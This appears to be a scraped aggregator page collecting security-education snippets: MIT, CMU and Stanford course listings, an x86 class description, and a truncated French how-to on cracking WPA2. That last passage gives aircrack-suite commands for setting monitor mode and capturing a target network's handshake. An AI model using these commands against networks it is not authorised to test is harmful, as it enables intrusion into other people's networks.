background preloader

Penetration Testing and Vulnerability Analysis - Home

Penetration Testing and Vulnerability Analysis - Home

Sec and Infosec Related - MIT SIPB IAP 2009 Activities IAP 2009 Class List: Fri Jan 23, 5:00–7:00pm, 4-231 Single session event Prereq: basic familiarity with C C, love it or hate it, is somewhere at the foundation of most software today. Topics covered may include: function pointers addresses of labels using gotos safely and correctly full for loop notation (i = 0, j = i; i < k; i++; j-=2)... inline asm constraints on arguments clobbers clones volatile and register keywords gcc special arguments/features: alignment constraints on variables packed structs macro notation (pasting, evaluation, sub-blocks) Contact: David Greenberg, W20-557, x3-7788, sipb-iap-advancedc at mit dot edu Fri Jan 23, 3:00–5:00pm, 4-231 Canceled Single session event Prereq: some experience with some UNIX-like system, some programming experience. You are encouraged to bring your laptop. Web: Contact: Geoffrey Thomas, W20-557, x3-7788, sipb-iap-kernel at mit dot edu Wed. Leave Word behind forever!

Cheat Sheet : All Cheat Sheets in one page ZenK-Security :: Communauté de sécurité informatique Software Security - CMU Overview: Poor software design and engineering are the root causes of most security vulnerabilities in deployed systems today. Moreover, with code mobility now commonplace--particularly in the context of web technologies and digital rights management--system designers are increasingly faced with protecting hosts from foreign software and protecting software from foreign hosts running it. This class takes a close look at software as a mechanism for attack, as a tool for protecting resources, and as a resource to be defended. Course Design and Goals: This course first covers state-of-the-practice, and progressively moves toward start-of-the-art in research. Describing and finding common vulnerabilities in programs such as buffer overflows in C programs and SQL injection vulnerabilities against websites. We will then move towards state-of-the-art in research, and cover topics such as model checking, symbolic execution, taint analysis, proof-carrying code, and other topics. Location

IntroX86 Creator: Xeno Kovah @XenoKovah License: Creative Commons: Attribution, Share-Alike ( Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code. Lab Requirements: Requires a Windows system with Visual C++ Express Edition. Class Textbook: “Professional Assembly Language” by Richard Blum. Recommended Class Duration: 2-3 days Creator Available to Teach In-Person Classes: Yes Author Comments: Intel processors have been a major force in personal computing for more than 30 years. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. This class serves as a foundation for the follow on Intermediate level x86 class. The instructor-led lab work will include: * Boolean logic (and, or, xor, not) * Signed and unsigned multiplication and division

Index - Accueil CS155 Computer and Network Security - Stanford Spring 2015 The course covers principles of building secure systems. We give many examples of how things can go wrong if these principles are not followed. Administrative Final Exam Students may take the final at either one of the following two dates: Option 1: (scheduled) Fri., 6/5, 3:30-6:30pm. For remote SCPD students: Please email the TAs with your email address, the email address of your SCPD monitor if you have one, and which day you would like to take the exam. Previous final exams: 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014. Homework Projects Darknet - The Darkside - Ethical Hacking, Penetration Testing & Computer Security

[HowTo] Cracker un réseau WPA2 - Accueil Salut Comme vous le savez, je ne suis ni programmeur de renommée ni hacker recherché. Cependant, les attaques contre les réseaux Wi-Fi, ça me parle. Je vous montre donc quelques résultats et informations que j'ai récoltés au fil du temps. Tout se passe sous BackTrack (version 5 R3). On initialise d'abord l'interface wlan0: Code : ifconfig wlan0 up airmon-ng start wlan0 airmon-ng stop mon0 Puis, on se renseigne sur les réseaux environnants: On obtient alors une liste de tous les AP ainsi que les terminaux qui y sont connectés: (j'ai masqué certaines informations avec des $$) BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:$$:E3:$$:64:$$ -26 183 15982 0 6 54e. Le but étant d'obtenir le handshake lors d'une connexion d'un terminal à l'AP, on optera pour une surveillance des réseaux "bondés". On utilise toujours airodump, mais cette fois on restreint son champ d'analyse. airodump-ng -c 1 --bssid 64:$$:D7:$$:47:$$ -w psk wlan0 On se retrouve alors avec ceci: Aircrack-ng 1.1 r2178